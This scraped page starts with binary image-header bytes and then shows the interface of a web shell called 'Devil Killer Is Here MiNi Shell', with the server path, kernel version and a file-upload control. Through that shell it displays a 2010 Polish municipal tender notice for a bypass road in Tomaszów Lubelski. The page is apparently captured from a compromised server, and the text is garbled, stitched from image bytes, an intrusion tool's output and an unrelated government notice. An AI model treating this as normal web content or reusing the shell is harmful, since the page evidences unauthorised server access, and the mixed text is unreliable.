JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100422/92683-N-2010.html

<p class="kh_header"><b>Tomaszów Lubelski: Wykonania drogi klasy Z  o charakterze obwodnicy dla starej części Miasta pomiędzy ulicami Piłsudskiego a Armii Krajowej w Tomaszowie Lubelskim</b><br>
<b>Numer ogłoszenia: 92683 - 2010; data zamieszczenia: 22.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonania drogi klasy Z  o charakterze obwodnicy dla starej części Miasta pomiędzy ulicami Piłsudskiego a Armii Krajowej w Tomaszowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa drogi klasy Z o charakterze obwodnicy dla starej części Miasta, pomiędzy ulicami Piłsudskiego a Armii Krajowej, w km 0+000 ÷ 0+320 w Tomaszowie Lubelskim, w ramach Projektu współfinansowanego przez Unię Europejską, Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013, wg 
opracowanego Projektu Budowlano - Wykonawczego,  zatwierdzonego decyzją zezwolenia na realizację inwestycji drogowej Nr AB.7351 - 422-09 z dnia 12.10.2009r. wydanej przez Starostwo Powiatowe w Tomaszowie Lubelskim i decyzją pozwolenia na budowę Nr 172/09 z dnia 16.09.2009r. wydanej przez Lubelski Urząd Wojewódzki w Lublinie dotyczącej włączenia drogi Z do drogi wojewódzkiej nr 853 (dz. nr 209) przy ul. Piłsudskiego w 
Tomaszowie Lubelskim.
Przedmiot zamówienia obejmuje :
1. budowę drogi klasy Z o charakterze obwodnicy dla starej części Miasta pomiędzy ulicami Piłsudskiego a Armii Krajowej w Tomaszowie Lubelskim, w szczególności :
a)  roboty rozbiórkowe :
  -  rozebranie krawężników betonowych na podsypce piaskowej -   346,0 m,
  -  rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej - 267,0 m,
  -  rozebranie chodników z kostki brukowej gr 6 cm na podsypce piaskowej -  463,0 m2,
  -  transport kostki brukowej, obrzeży i krawężników na odl. do 1 km   -  109,2 t,
b)  roboty ziemne :
  -  usuniecie warstwy ziemi urodzajnej o gr. do 15 cm za pomocą spycharek   -  600,0 m3,
  -  wykopy oraz przekopy o gł. do 3.0 m wyk. na odkład koparkami w gr. kat. III-IV  - 230,0 m3,
  -  wykopy wykonywane spycharkami w gr. kat. 1 - III   -  710,0 m3,
  -  przemieszczanie spycharkami mas ziemnych kat. I- III na odl. do 10 m  -   710,0 m3,
  -  formowanie i zagęszczanie nasypów o wys. do 3,0 m spycharkami w gr. kat. III  -  1317,0 m3,
c)  krawężniki - ustawienie krawężników betonowych o wym. 20x30 cm na ławach betonowych z oporem na podsypce cement. piask.        -   781,0 m,
d)  podbudowa :
  -  profilowanie i zagęszczanie podłoża;  warstwa odsączająca zagęszczona mechanicznie o gr.10 cm;  stabilizacja cementem 2,5 MPa gr. 15 cm i wzmacniającej z betonu 5,0 MPa gr. 15 cm pielęgnowane piaskiem i wod;  wykonanie zasadniczej podbudowy z mieszanki kruszywa stabilizowanego mechanicznie gr. 20 cm  -   1750,0 m2,
e)  nawierzchnia :
  -  nawierzchnia z mieszanek min.bitum. asfalt. o gr. 6 cm (warstwa wiążąca) KR-2  -  1750 m2,
  -  nawierzchnia z mieszanek min.bitum. asfalt. o gr. 5 cm (warstwa wyrównawczo - wzmacniająca) KR-2   -   1032,9 m2,
  -  nawierzchnia z mieszanek mineralno-bitumicznych asfaltowych o gr. 5 cm (warstwa ścieralna)  KR-2     -   2782,9 m2,
f)  parking :
  -  profilowanie i zagęszczanie podłoża w gr. kat. II-IV pod warstwy konstrukcyjne; warstwa odsączająca zagęszczona mechanicznie o gr. 10 cm; wykonanie warstwy stabilizacyjnej 2,5 MPa gr.10 cm pielęgnowana piaskiem i wodą   -   303,75 m2,
  -  podbudowa betonowa 5,0 MPa gr. 20 cm pielęgnowana piaskiem i wodą;    nawierzchnia z kostki betonowej gr. 8 cm na podsypce cement.-piask. z spoinowaniem piaskiem - 303,95 m2,
g)  chodnik z obrzeżami wykonane zgodnie z dokumentacja projektową   -  1390,6 m2,
h)  zjazdy  wykonane zgodnie z dokumentacja projektową   -   142,6 m2,
i)   oznakowania i roboty wykończeniowe zgodnie z dokumentacją projektową
     i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2. budowę sieci kanalizacji deszczowej,
a)  wykonanie kanałów z rur strukturalnych PVC-U typu PROCOR o sztywności SN8 łączonych na kielichy z uszczelnieniem pierścieniem gumowym o śr. nom.300 mm - 131,5 m,
b)  wykonanie kanałów z rur strukturalnych PVC-U typu PROCOR o sztywności SN8 łączonych na kielichy z uszczelnieniem pierścieniem gumowym o śr. nom. 400 mm - 90,5 m,
c)  wykonanie kanałów z rur strukturalnych PVC-U typu PROCOR o sztywności SN8  łączonych na kielichy z uszczelnieniem pierścieniem gumowym o śr. nom. 500 mm  -  99,0 m,
d)  wykonanie kanałów z rur strukturalnych PVC-U typu PROCOR o sztywności SN8  łączonych na kielichy z uszczelnieniem pierścieniem gumowym o śr. nom. 600 mm - 33,5 m,
e)  wykonanie kanałów z rur PVC-U klasy S, SN8 kN/m2 o śr. 200 mm i gr. ścianki 5,9 mm łączonych przy użyciu uszczelek gumowych  -   116,5 m,
f)  studnie kanalizacyjne prefabrykowane o śr. 1200 mm w wykopie o gł. do 3,0 m   -   9 szt,
g)  studnie kanalizacyjne prefabrykowane o śr. 1500 mm w wykopie o gł. do 3,0 m   -   3 szt,
h)  osadnik poziomy typu OS1200 ECOL-UNICOL  o Sr. wew. 1200 mm o gł. do 3,0 m  - 1 szt,
i)  osadnik poziomy typu OS1500 ECOL-UNICOL  o Sr. wew. 1500 mm o gł. 2,5 m      - 1 szt,
j)  osadnik poziomy typu OS2000 ECOL-UNICOL  o Sr. wew. 2000 mm o gł. do 3,0 m  - 2 szt,
k)  osadnik poziomy typu OS2500 ECOL-UNICOL  o Sr. wew. 2500 mm o gł. do 3,0 m  - 1 szt,
l)  studnie wpustów ulicznych o śr. wewn. 500 mm z osadnikami min. 800 mm         - 26 szt,
i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
3.  przebudowy sieci wodociągowej i przyłączy wod.- kan. zgodnie z dokumentacja projektową przedmiarami robót i Specyfikacją techniczną wykonania i odbioru robót budowlanych.
4.  budowę linii kablowej oświetlenia drogowego.
  a)  stawianie słupów oświetleniowych, montaż wysięgników i opraw do lamp sodowych - 11 szt,
  b)  wykopy pod kable i układanie kabli wielożyłowych o masie do 1,0 kg/m na nap. znam. poniżej 110 kW w rowach kablowych  -  378,0 m,
 i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
5.  przebudowę sieci i przyłączy energetycznych zgodnie z dokumentacja projektową, przedmiarami robót i Specyfikacją techniczną wykonania i odbioru robót budowlanych.
6.  budowę sygnalizacji świetlnej na skrzyżowaniu drogi wojewódzkiej Nr 853 - ul. Piłsudskiego z ul. Piekarską i projektowaną drogą klasy Z w Tomaszowie Lubelskim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.00.00-8, 45.23.14.00-9, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w wysokosci 40 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy , którzy spełniają warunki określone w art. 22 ust. 1 ustawy  Prawo zamówień publicznych dotyczące:    
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania.        
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy wymaga od Wykonawcy, aby wykazał się doświadczeniem wykonania już co najmniej 2 robót drogowych z nawierzchnią mineralno-bitumiczną asfaltową o powierzchni co najmniej 1 000 m2  każda. 
 Wykonawcy przedłożą w ofercie wykaz robót budowlanych wg Załącznika Nr 3 do SIWZ -  Wykaz ważniejszych realizacji  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone , np.  referencję, protokół odbioru, itp.  
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami;
Zamawiający wymaga by wykonawca wykazał się możliwością dysponowania następującym sprzętem :
-   równiarki lub spycharki uniwersalne,
-   koparki z czerpakami profilowymi,
-   równiarka,
-   betoniarki do wytwarzania betonu,
-   walec statyczny,
-   płyty wibracyjne lub ubijaki mechaniczne, 
-   wytwórni (otaczarki) o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek mineralno-asfaltowych,  
-   układarek do mieszanek mineralno-asfaltowych typu zagęszczanego,
-   walców lekkich, średnich i ciężkich, gładkich, walców ogumionych,
-   szczotek mechanicznych lub / i innych urządzeń czyszczących,
-   samochodów samowyładowczych. 
 Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,
Wykonawca dołaczy oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Wykonawca załączy do oferty oświadczenie, że osoby wyznaczone do nadzorowania robót posiadają odpowiednie uprawnienia budowlane w  branży drogowej, sanitarnych i elektrycznej z przynależnością do właściwej izby samorządu zawodowego. 
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by wykonawca  przedstawił :
a)  informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  wniosków o dopuszczenie do  udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
b)  Zamawiający wymaga by wykonawca dysponował środkami finansowymi lub zdolnością kredytową w wysokości co najmniej 200 000 zł,
c)  jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przed- stawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez  zamawiającego warunku.
d)  jeżeli wykonawca, wykazując spełnienie warunku, o którym mowa w art. 22, ust. 1, pkt. 4 ustawy (dot. sytuacji ekonomicznej i finansowej)  polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26, ust. 2b ustawy Pzp, wymaga przedłożenia informacji z banku, jak w pkt. 5.4.lit. a i b SIWZ, dotyczącej tych podmiotów,
e) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Warunek ten Zamawiający uzna za spełniony, jeżeli wykonawca składający ofertę jako firma lub osoba fizyczna udokumentuje posiadanie  wymienionych wyżej środków finansowych na koncie w banku i przedstawi w ofercie poświadczone ksero żądanej polisy.
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zgodnie z art. 144 zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w  następujących przypadkach : 
a)  zmiana zakresu robót, wystąpienie robót dodatkowych  lub zamiennych, od wykonania których jest uzależnione wykonanie zamówienia podstawowego z możliwością zmiany terminu realizacyjnego zadania,
b)  wystąpienia okoliczności powodujących konieczność rezygnacji przez Zamawiającego z części zakresu robót wykonywanych przez wykonawcę w przypadku ograniczenia lub przerwania dofinansowania realizacji zadania ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013,
c)  wystąpienia okoliczności uniemożliwiających wykonanie inwestycji w określonym terminie wskutek działania siły wyższej,
d)  wystąpienia przestojów spowodowanych koniecznością usunięcia przeszkód (np.  niewybuchy) usunięcia uszkodzeń w podziemnych urządzeniach sieci, nieoznaczonych w dokumentacji projektowej lub wstrzymania realizacji robót przez uprawnione organy z przyczyn nie wynikających z winy stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl/infpub/przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta w Tomaszowie Lubelskim, ul. Lwowska 57;  22-600 Tomaszów Lubelski, Wydział Inwestycji i Gospodarki Komunalnej, pokój Nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2010 godzina 11:00, miejsce: Urząd Miasta w Tomaszowie Lubelskim, ul. Lwowska 57;  22-600 Tomaszów Lubelski, Sekretariat Burmistrza Miasta, pokój Nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




